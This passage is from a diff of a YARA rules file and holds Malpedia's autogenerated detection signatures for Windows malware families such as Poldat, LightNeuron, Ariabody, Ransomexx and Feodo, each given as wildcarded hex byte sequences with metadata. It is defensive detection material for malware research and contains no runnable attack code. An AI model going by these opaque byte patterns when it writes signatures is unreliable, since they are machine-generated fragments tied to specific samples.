"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poldat_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jripbot_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "eec21397be824c40480269ad179cee66cff4f29ddc631fb679aa6de7be434481" + logic_hash = "e485f4c42ec7ab7e0d2df3f1cd3bb910f7710773a4391061675b3c77a4acf337" score = 75 quality = 75 tags = "FILE" @@ -168754,32 +171615,32 @@ rule MALPEDIA_Win_Poldat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b35???????? 6a08 66ab 58 } - $sequence_1 = { 57 6a05 6a00 68???????? } - $sequence_2 = { 50 e8???????? 68fe010000 8d86b8070000 57 } - $sequence_3 = { 8a50ff 881431 41 48 3d???????? 7ff1 8d45fc } - $sequence_4 = { 8b0c9d68c34100 8b5e04 23ca 03cb 33db 8a1cce 8d34ce } - $sequence_5 = { 50 ff15???????? 56 e8???????? 59 5f 5e } - $sequence_6 = { 8b4c241c 8b0c8d68c34100 23cf 03c1 8b4c241c d3ef 03ca } - $sequence_7 = { 750a c74720a0324000 895728 395724 7507 } - $sequence_8 = { 7233 e9???????? 8b4c243c 8b5c2410 8b7104 c7411824d84100 } - $sequence_9 = { f7f9 8bfa ffd6 50 } + $sequence_0 = { 48 3b442418 0f822bffffff 8b8c24fc010000 5f 5e 5b } + $sequence_1 = { c1e807 8807 02d2 885701 66c7060100 33c9 837b0401 } + $sequence_2 = { 8b5d08 c1eb08 23d8 0fb69b38834200 c1e608 33f3 8b5d0c } + $sequence_3 = { 8d742414 e8???????? 59 59 eb06 895c240c 33c0 } + $sequence_4 = { 33c0 8b8eb8000000 3bc7 0f95c0 6a02 884105 33db } + $sequence_5 = { 51 50 56 56 ff750c ff75fc ffd7 } + $sequence_6 = { 50 e8???????? 8b1d???????? 83c40c 8d442438 50 ff15???????? } + $sequence_7 = { 8b4004 894604 33c0 8b8c242c010000 5f 5e 5b } + $sequence_8 = { eb04 8b442430 8b4c241c 2b4c2418 ff742418 8b5c2438 } + $sequence_9 = { 7443 3bf8 743f 8b4368 397008 7537 8b4df4 } condition: - 7 of them and filesize <247808 + 7 of them and filesize <507904 } -rule MALPEDIA_Win_Attor_Auto : FILE +rule MALPEDIA_Win_Lightneuron_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "de68d27a-a7e8-5baa-94a2-9db640461043" + id = "539cc86b-948c-5a39-97ed-a3902d358bcb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.attor_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightneuron_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "9ffbefbd2b4397dd03e1eba42ffa85ea59dac9e4723a113680ffe4af7c4fe1e3" + logic_hash = "eb817806e099f7ab1d4d5a04d338d80185e8c65715cfe2e18f8deb16ab95898d" score = 75 quality = 75 tags = "FILE" @@ -168793,40 +171654,34 @@ rule MALPEDIA_Win_Attor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83f801 7411 3d81000000 740a } - $sequence_1 = { 33c0 488b6c2450 4883c420 415c 5f 5e } - $sequence_2 = { 488b8c24b0000000 4c8b642468 4885c9 7402 8919 408ac5 } - $sequence_3 = { 488b8c2490000000 4885c9 0f8441020000 41b802000000 8bd5 ff15???????? 85c0 } - $sequence_4 = { 48395c2430 0f8447010000 b101 e8???????? } - $sequence_5 = { 48c744243000000000 7414 33c9 e8???????? 488b8c2490000000 } - $sequence_6 = { 7435 488b442440 488b8c2490000000 4533c0 418d5002 4d8bcf } - $sequence_7 = { 4533c0 4d8bcc 418d5002 44896c2420 ff15???????? } - $sequence_8 = { 8b4c2418 50 55 8b2d???????? 6a00 } - $sequence_9 = { 740a 83f808 7405 83f811 } - $sequence_10 = { 56 ff15???????? 8d4c2418 8d54241c 51 52 } - $sequence_11 = { 83c408 eb06 8b35???????? 897c241c 8b7c2420 85ff } - $sequence_12 = { 83c40c 89442420 85c0 0f842b010000 8b4c2430 8d7108 } - $sequence_13 = { 85c0 0f840c010000 8b54241c 57 52 } - $sequence_14 = { 897504 c644241301 740a 8b4c2418 } - $sequence_15 = { 8b44243c 3bc7 7434 8b54241c } + $sequence_0 = { e8???????? 488d8c2434010000 33d2 41b800010000 89b42430010000 e8???????? 488bcf } + $sequence_1 = { 0f4ed9 3bc5 770b 3beb 7707 b801000000 eb02 } + $sequence_2 = { 85d2 7e24 488b8f80000000 e8???????? 488b8f80000000 4885c9 740c } + $sequence_3 = { e8???????? 8bf0 85c0 7502 893b 85f6 754c } + $sequence_4 = { 4503c1 453bc1 4183d200 4403c0 443bc0 45894304 } + $sequence_5 = { 448bc3 e8???????? 448bc3 33d2 498bcd e8???????? 498bcd } + $sequence_6 = { 4c0f45c0 488b05???????? 4885c0 480f45d0 488d442448 4889442430 4c896c2428 } + $sequence_7 = { 488bd0 498bcc e8???????? 4d8b0c24 458b44240c 33d2 } + $sequence_8 = { 48895c2428 89442420 e8???????? 448b05???????? 4533c9 ba9d010000 b900001000 } + $sequence_9 = { 4533c9 4533c0 babf000000 b900001000 48895c2428 89442420 e8???????? } condition: - 7 of them and filesize <2023424 + 7 of them and filesize <573440 } -rule MALPEDIA_Win_Winmm_Auto : FILE +rule MALPEDIA_Win_Ariabody_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e5922e79-076b-5a5c-ba27-8c0bb532ca1f" + id = "58204a37-6e57-54ad-a9ad-f1e207420b64" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winmm_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ariabody_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "9d8038e46a83e5b1250014db0840b8d665afb5078d6d9005cce493b4024246af" - score = 60 - quality = 35 + logic_hash = "eeda1b828c38fb501f5c05c0fadc1525e86a5abb54edde2f591e92fd62c5dd82" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -168838,32 +171693,38 @@ rule MALPEDIA_Win_Winmm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740c 663d3000 7406 663d2000 750b 668b042e 03f5 } - $sequence_1 = { 03ce 7504 33c0 5e } - $sequence_2 = { 7d03 6a01 5f 85ff 0f8449ffffff } - $sequence_3 = { 89462c ff15???????? 8bce 894604 e8???????? 85c0 } - $sequence_4 = { 8bc8 ff5274 c3 33c0 c3 c3 56 } - $sequence_5 = { 83c308 bf80000000 eb1d 83e86e } - $sequence_6 = { e8???????? 59 eb1d 6a02 83c304 5f } - $sequence_7 = { 663d2000 750b 668b042e 03f5 663bc7 75c0 397c2428 } - $sequence_8 = { 7c02 8bfd 3b7c2428 7f5a 8b7c2428 } - $sequence_9 = { 83c40c 85c0 752d 83c606 } + $sequence_0 = { eb13 8b16 8bcf e8???????? 8906 85c0 } + $sequence_1 = { 8bcf 0fb6c0 50 ff75fc e8???????? } + $sequence_2 = { 7402 32c3 88040a 41 } + $sequence_3 = { 8a01 84c0 7406 3ac3 7402 } + $sequence_4 = { 56 8d0c30 ffd1 8bc6 5f } + $sequence_5 = { 8bf2 56 8d55fc 03f9 e8???????? 59 85c0 } + $sequence_6 = { 83ec50 53 57 8bd9 e8???????? 8bf8 893b } + $sequence_7 = { ff5304 8bf8 893e eb13 8b16 8bcf } + $sequence_8 = { 33d2 488d8c2498000000 41b800010000 41ffc7 ff9510020000 } + $sequence_9 = { 48895c2408 57 4883ec20 4863d9 488d3da4d30000 4803db 48833cdf00 } + $sequence_10 = { eb17 83f802 7512 488d4c2430 488d942420060000 e8???????? } + $sequence_11 = { 33ff 488d0480 418b4cc60c 418b54c614 4903cc 458b44c610 4803d3 } + $sequence_12 = { e8???????? 3d5595db6d 741d 4d8b7f18 } + $sequence_13 = { 41b820000000 488d942444010000 4c8d8c2468010000 48c7402000000000 41ff96d0000000 85c0 7429 } + $sequence_14 = { 4c89e1 4533c9 8b942464010000 41ff96c0000000 4889e0 4c89e1 41b820000000 } + $sequence_15 = { 8b0b e8???????? 48630b 4c8d2dd59f0000 488bc1 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Albaniiutas_Auto : FILE +rule MALPEDIA_Win_Cohhoc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59f4d909-2fdf-5b2b-b2d0-e08828d007ee" + id = "b68a758f-10e4-5b26-9336-04dc8575909c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.albaniiutas_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cohhoc_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "121e552bf42e7769ddf3d97832d0aa4668207291feb4416fe4bffab1efac2c40" + logic_hash = "ecae8715f2ad96196b29dfd6ae017f72fc211d8d4ab8ab2002ae190526566a13" score = 75 quality = 75 tags = "FILE" @@ -168877,32 +171738,32 @@ rule MALPEDIA_Win_Albaniiutas_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745f800000000 50 8bf2 c745f400000000 8bf9 } - $sequence_1 = { c1f906 6bc030 03048d90df0210 50 ff15???????? 5d c3 } - $sequence_2 = { 23c1 eb57 53 8b1c85c8540110 } - $sequence_3 = { c705????????01000000 c705????????01000000 6a04 58 6bc000 c7806cda021002000000 6a04 } - $sequence_4 = { 59 83cfff 897de4 8365fc00 8b049d90df0210 8b4de0 f644082801 } - $sequence_5 = { 898850030000 8b4508 59 c74048c0a40110 8b4508 6689486c } - $sequence_6 = { 68???????? ffd6 68???????? 8d45d4 c745d400000000 50 e8???????? } - $sequence_7 = { 83e801 0f8580000000 8b4508 dd00 ebc6 c745e0f87c0110 } - $sequence_8 = { 660fd60f 8d7f08 8b048dd46a0010 ffe0 f7c703000000 7413 } - $sequence_9 = { 33048dc01c0110 0fb6ca 33048dc0280110 ff4d08 0f8502feffff 83ff04 } + $sequence_0 = { 1bc0 83d8ff 85c0 0f84fb000000 bf???????? 8db424b4010000 8a0e } + $sequence_1 = { 5b 81c49c020000 c3 8b542410 } + $sequence_2 = { e8???????? 50 6801010000 8bcd e8???????? 8bcd } + $sequence_3 = { 33c0 5b 83c444 c3 8b542434 8b442458 6a00 } + $sequence_4 = { 817c240c03010000 0f8494010000 8b35???????? 8d442410 53 50 68???????? } + $sequence_5 = { 66c74424040010 8974242c 89742430 8b442448 8b4c2444 50 } + $sequence_6 = { bf01000000 6a00 68???????? ffd6 85ff } + $sequence_7 = { 88442424 894c2430 8b4c2424 57 51 8b4c2428 e8???????? } + $sequence_8 = { 6a07 51 6a00 aa } + $sequence_9 = { 8bc8 8d8424b4010000 83e103 f3a4 be???????? 8a10 8aca } condition: - 7 of them and filesize <566272 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Ransomexx_Auto : FILE +rule MALPEDIA_Win_Shimrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f239143d-e5d1-5c3c-aec9-a76464ab403c" + id = "9f2cf600-46fb-5fe2-9403-91a4ffe5dc91" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ransomexx_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shimrat_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "3b39ad6bc64b52ed616287d6ece517d9776b1298e49d7060ccab50a0c57b68b4" + logic_hash = "4e378ef30b6703953f18ff74f4c2d2ea366c27ea22af1636e2d889f102c09783" score = 75 quality = 75 tags = "FILE" @@ -168916,32 +171777,32 @@ rule MALPEDIA_Win_Ransomexx_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc3 8d75e0 e8???????? 8bf0 85f6 0f85f8020000 eb07 } - $sequence_1 = { 6884010000 6a08 c745fc04010000 ffd7 50 ff15???????? 8bf0 } - $sequence_2 = { 8b4f08 3bce 7425 8b4704 03c0 03c0 } - $sequence_3 = { 8bf8 85ff 752c 8d55f8 c70601000000 6a02 } - $sequence_4 = { c1ee0a 33fe 8bf7 8b7dfc 039c3da4feffff 03f3 } - $sequence_5 = { c1ee03 33fe 03df 8b7dfc 039c3db8feffff 8bb43d94feffff 03f3 } - $sequence_6 = { 837df801 0f8612010000 8b4df8 8b5f04 49 b801000000 d3e0 } - $sequence_7 = { 8b55f0 8b4508 8d4dd0 51 52 57 50 } - $sequence_8 = { 56 50 e8???????? 8b07 83c40c 8975fc } - $sequence_9 = { 39742420 0f862e010000 8d642400 837c242001 7540 837c242400 7539 } + $sequence_0 = { e8???????? 59 59 6a01 8d452c } + $sequence_1 = { eb1a 83f802 7513 83ec0c 8d4660 8bcc 50 } + $sequence_2 = { ff7508 8d85fcfeffff 50 e8???????? 59 59 85c0 } + $sequence_3 = { ff15???????? 8d4df4 e8???????? 8d4d08 e8???????? 5e } + $sequence_4 = { e8???????? 59 59 895e1c ff15???????? 8bce 899ec0000000 } + $sequence_5 = { ff15???????? 8bce 899ec0000000 e8???????? 85c0 750e } + $sequence_6 = { 837d0800 7424 837d0c00 741e ff7510 ff750c } + $sequence_7 = { 50 8bce e8???????? 85c0 74d9 ff75e8 8d4df0 } + $sequence_8 = { 6a00 68???????? 53 ffd7 ff7570 ff15???????? e9???????? } + $sequence_9 = { 83c414 50 8d4f6c e8???????? } condition: - 7 of them and filesize <372736 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Brutpos_Auto : FILE +rule MALPEDIA_Win_Aperetif_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bb6abccd-59b3-5a30-9e67-ccbe498737a5" + id = "dd57eb34-4374-5f40-adeb-74673af556ba" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.brutpos_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aperetif_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "89d0bc6a7e52ba9f63dface96ebbf483b03be0cbf8144ed32f3b88bf360b4eda" + logic_hash = "cb1f1d595273c378c0af7214424a9c75d431ec33b0d3744330f8349a67692fb4" score = 75 quality = 75 tags = "FILE" @@ -168955,32 +171816,32 @@ rule MALPEDIA_Win_Brutpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 58 83c004 83e904 8808 } - $sequence_1 = { 03c2 034508 2938 83e902 75e8 ebd9 5e } - $sequence_2 = { 8d5b18 8b5b60 03d8 52 8b35???????? } - $sequence_3 = { 6681f9df77 7412 0f31 8bd8 } - $sequence_4 = { 8bd0 ad 8bc8 83e908 66ad 6685c0 740c } - $sequence_5 = { 8d7c38fc baffffffff 83c704 57 } - $sequence_6 = { 66ad 6685c0 740c 25ff0f0000 03c2 034508 } - $sequence_7 = { 52 e8???????? 59 8b09 8bd1 } - $sequence_8 = { c1e202 03d3 8b12 03d0 } - $sequence_9 = { 8b5508 8b4204 0fb70a 50 51 807401ff97 } + $sequence_0 = { 8b4108 8975e4 c70100000000 c7410400000000 8945ec c7410800000000 c645f301 } + $sequence_1 = { e8???????? 8a45d8 884524 8b0e c645fc02 85c9 0f8412010000 } + $sequence_2 = { 50 8d45f4 64a300000000 8bd9 895db8 8b7508 837e1000 } + $sequence_3 = { f20f118424f8080000 8b0cb0 85c9 7422 8b742464 90 0fb7047e } + $sequence_4 = { ff74242c 57 e8???????? 83c410 eb14 8b8724000800 b900000200 } + $sequence_5 = { 8954242c 660f1f440000 53 ff742424 68c0000000 56 55 } + $sequence_6 = { ff742410 ff742424 e8???????? 83c408 897c2410 89742450 8b44245c } + $sequence_7 = { e8???????? ff742434 53 e8???????? ff742428 53 e8???????? } + $sequence_8 = { ff5210 8b4dc8 c7451803000000 85c9 7418 8b11 8d45a4 } + $sequence_9 = { e8???????? c7868400000000000000 8b37 8b8e84000000 85c9 7506 8b8e88000000 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <10500096 } -rule MALPEDIA_Win_Treasurehunter_Auto : FILE +rule MALPEDIA_Win_8Base_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d910c7d8-579e-5e04-9944-d334673c4daa" + id = "7c9b0c56-079f-5ac3-b0fc-c036345ce952" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.treasurehunter_auto.yar#L1-L103" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.8base_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "15ce0cdcd8ce74cbd944226eb16c8cf48295e060eba7d0ca2d750492d2eadd11" + logic_hash = "ea755be9fd3154ace1513f9f57e59c67fbe5ae97b6b4073ab7fa5cccbb0a5bb8" score = 75 quality = 75 tags = "FILE" @@ -168994,30 +171855,32 @@ rule MALPEDIA_Win_Treasurehunter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 75f9 2bf0 e8???????? 8bd0 } - $sequence_1 = { 53 56 8b35???????? 8bd9 8b4d08 57 } - $sequence_2 = { 8bf8 e8???????? 68???????? 57 e8???????? } - $sequence_3 = { 8bd9 8b4d08 57 8955fc e8???????? 8bce 8bf8 } - $sequence_4 = { 57 8bf9 8bca e8???????? 8b7508 } - $sequence_5 = { 56 50 8903 ff15???????? 8b4dfc } - $sequence_6 = { 7e0b 4a e8???????? 0fafc6 5e c3 } - $sequence_7 = { e8???????? b9???????? a3???????? e8???????? 5f 5e a3???????? } + $sequence_0 = { 6a00 ff15???????? 8d8e04a2feff 81f98c230000 770b } + $sequence_1 = { f8 290c67 98 a6 73c2 } + $sequence_2 = { 8815???????? c605????????6f 880d???????? c605????????65 c605????????63 } + $sequence_3 = { 8d3485c0289100 8b06 83e71f c1e706 03c7 8a5824 } + $sequence_4 = { c684249c00000002 50 c7442410043a4000 e8???????? } + $sequence_5 = { d3ea 89542414 8b442434 01442414 8b442424 31442410 } + $sequence_6 = { ff15???????? 8b442414 40 3d???????? 89442414 0f8c0effffff 8b35???????? } + $sequence_7 = { 8bf7 83e61f c1e606 033485c0289100 c745e401000000 } + $sequence_8 = { 6689442416 33c9 668954241a 8d442434 50 66894c241c 8b4c241c } + $sequence_9 = { 899c24ac000000 3bfb 7449 8b8424b8000000 56 8d742418 } condition: - 7 of them and filesize <229376 + 7 of them and filesize <10838016 } -rule MALPEDIA_Win_Blindingcan_Auto : FILE +rule MALPEDIA_Win_Radamant_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cb880a40-09fd-57de-a5ce-976bc164d187" + id = "1ede87f9-320c-576f-9524-930f09ad6207" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blindingcan_auto.yar#L1-L180" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.radamant_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "7d6669fb427721c8bcc6cd766a15275abac3a422e034ffec946a676b43de9099" + logic_hash = "add6ca5b01c9d6d8dad27d0b268d58bbdb18019e152c79d40b24c8426bcce310" score = 75 quality = 75 tags = "FILE" @@ -169031,38 +171894,32 @@ rule MALPEDIA_Win_Blindingcan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 68???????? 68???????? ff15???????? 689c040000 85c0 } - $sequence_1 = { 750a 8b10 8994bdfcfdffff 47 83c00c 49 } - $sequence_2 = { c785bcfdffff661fcba8 c785c0fdffffc0f0d181 c785c4fdffff1f08c3d4 c785c8fdffff28edbc6a c785ccfdffff12aff210 } - $sequence_3 = { c745e4ef0dfff5 c745e85acd9c1d c745ec36c2f964 c745f0a70d9fae c745f48f2aedf1 } - $sequence_4 = { c78594feffff657f9183 c78598feffffa78b5b05 c7859cfeffff87f53e0c c785a0feffff074f9b22 } - $sequence_5 = { c745ac84b1df57 c745b0c8cbfee9 c745b4567e337f c745b8e958e686 } - $sequence_6 = { c78548feffffdfc2f62c c7854cfeffff17516633 c78550fefffff76c7e7e c78554feffffa14b0c27 c78558feffff10c0aac6 c7855cfeffff489a8471 c78560feffff9cab4ad6 } - $sequence_7 = { 740c a810 7408 c68435a8fcffff01 46 83fe1a } - $sequence_8 = { f7fe 8bca e8???????? 85c0 7409 e8???????? } - $sequence_9 = { 55 4154 4155 488da8e8f3ffff 4881ec000d0000 488b05???????? 4833c4 } - $sequence_10 = { 8bd5 664489642422 6689442420 895c2428 e8???????? 8bd3 488bcf } - $sequence_11 = { 85c0 751b e8???????? 4885c0 7461 448bc7 488d55c0 } - $sequence_12 = { 81e909200000 746e 83e907 745f ffc9 744d ffc9 } - $sequence_13 = { 410fb6c4 0fb68c2810be0100 41335518 400fb6c6 0fb6842810be0100 c1e108 33c8 } - $sequence_14 = { 488b4dc8 488d45c0 4c8d4db0 4889442428 488d0552d30100 488d1586340100 4533c0 } - $sequence_15 = { ff15???????? 4883ceff 4c8be8 4889442440 483bc6 752d ff15???????? } + $sequence_0 = { 8802 8b5510 42 8b45f8 } + $sequence_1 = { 890424 e8???????? 8b85c8f6ffff 890424 e8???????? 8b85d4f6ffff 890424 } + $sequence_2 = { 8d45f0 ff00 eb9b c9 } + $sequence_3 = { 01d0 8d148500000000 01d0 29c1 89c8 83c061 8945b0 } + $sequence_4 = { 331485b0164100 89d0 8945e8 8b55fc 83c204 8b45f4 c1e818 } + $sequence_5 = { 8d148500000000 01d0 29c1 89c8 83c061 8945b0 } + $sequence_6 = { c1e818 0fb6c0 0fb680b0094100 31d0 8901 8b4df4 83c124 } + $sequence_7 = { 8b8520feffff 890424 e8???????? 83ec0c 83f8ff 752a 8b45c4 } + $sequence_8 = { e8???????? 8b45f4 890424 e8???????? 83c424 5b 5d } + $sequence_9 = { 8d45e8 c1000a 8b55f4 8d45e8 0110 8b45f0 f7d0 } condition: - 7 of them and filesize <363520 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Fatduke_Auto : FILE +rule MALPEDIA_Win_Unidentified_053_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1df82884-dd37-5110-97a3-f389ea498843" + id = "b8635dce-dc5b-565f-a079-d654a222f110" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fatduke_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_053_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "40661bdfa7c29a9f9d4cfc7da5ee8f1460f5e36e7c11bd94001d922b76261842" + logic_hash = "466de537792d4c8cf5922d9a48018d257023e4a1753f3d834debb6d43be45c35" score = 75 quality = 75 tags = "FILE" @@ -169076,32 +171933,32 @@ rule MALPEDIA_Win_Fatduke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 807b0d00 7552 ff7608 8bc8 e8???????? 8b36 8d7b10 } - $sequence_1 = { 8bcb 85f6 7455 83ee04 7211 8b01 3b02 } - $sequence_2 = { ff75f0 c746140f000000 c7461000000000 c60600 e8???????? 8b4b04 83c404 } - $sequence_3 = { e8???????? c745c000000000 c745c400000000 c745c40f000000 c745c000000000 c645b000 3bc1 } - $sequence_4 = { e8???????? 83c404 c745bc0f000000 c745b800000000 c645a800 c745fcffffffff 837dec10 } - $sequence_5 = { c7864c01000000000000 c6863c01000000 c645fc0b 83be3801000010 720e ffb624010000 e8???????? } - $sequence_6 = { f7d3 23da 7419 2bf9 8bff 8a040f 8d4901 } - $sequence_7 = { 83ec1c a1???????? 33c5 8945fc 8b4508 8b4910 8945e4 } - $sequence_8 = { 8d4e08 51 e8???????? c745fcffffffff 8bc6 8b4df4 64890d00000000 } - $sequence_9 = { ff75c0 e8???????? 83c404 c745d40f000000 8ac3 c745d000000000 c645c000 } + $sequence_0 = { 753c ff75e4 68???????? e8???????? 85c0 59 } + $sequence_1 = { c1c603 81ea584dff93 8915???????? e8???????? 42 } + $sequence_2 = { 8d3c85a8914100 833f00 bb00100000 7520 53 e8???????? } + $sequence_3 = { ff75f0 50 ff91c4010000 8945f4 85c0 } + $sequence_4 = { f7d7 c1c30e ffd0 890d???????? 87c7 2bc3 f7da } + $sequence_5 = { f7db c1c017 e8???????? f7d1 } + $sequence_6 = { 03f7 46 f7d8 81ebd4b243e9 c1c80c } + $sequence_7 = { 3b8e50894100 0f8515010000 a1???????? 83f801 0f84df000000 3bc2 } + $sequence_8 = { 81f669d8509c f7d2 686c6c6f63 e8???????? 4e 03c1 890d???????? } + $sequence_9 = { 8b048588814100 234508 8b4e14 8d04c1 0fb64801 8b5004 83fa10 } condition: - 7 of them and filesize <9012224 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE +rule MALPEDIA_Win_Feodo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ffd06a30-064b-5d5c-9708-094ba6b3f858" + id = "63743f44-4e6b-5a91-9837-bc3f6dee3649" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rapid_ransom_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.feodo_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "467069894b412bd66ec7bc5db00e763aed4734a1d880a5b3cc4cb8b392b71ec1" + logic_hash = "b3401747482af4dd4837f27d2a5311953b45c82ad5e6a5cd690191bf7d127342" score = 75 quality = 75 tags = "FILE" @@ -169115,37 +171972,38 @@ rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 6801000004 6800a40000 ff75f8 } - $sequence_1 = { 83ec10 53 56 57 8bf9 32db 8bf2 } - $sequence_2 = { 83ec1c 53 57 8bf9 8bc2 } - $sequence_3 = { ff15???????? 6a00 ff75f8 ff15???????? 5e 5f 8ac3 } - $sequence_4 = { 7509 803a00 0f840c010000 8d742464 b8???????? 84db } - $sequence_5 = { 56 8bf2 8975fc 57 8bf9 85db } - $sequence_6 = { e8???????? 83c430 8d45f4 6800010000 } - $sequence_7 = { 7425 ff7514 8b542418 8bce ff7510 c644241701 57 } - $sequence_8 = { 0f8483000000 eb7d 8b1c9df8584100 6800080000 } - $sequence_9 = { 740e 50 e8???????? 83a6e8d0410000 59 83c604 } - $sequence_10 = { 8be5 5d c3 ff75e0 e8???????? 53 e8???????? } - $sequence_11 = { eb72 8d04cd00000000 2bc1 46 8935???????? c6048564d3410001 893c856cd34100 } - $sequence_12 = { 6804010000 8d85a4feffff 8bf1 6a00 50 } - $sequence_13 = { 40 c745ecf54e4000 894df8 8945fc 64a100000000 8945e8 } 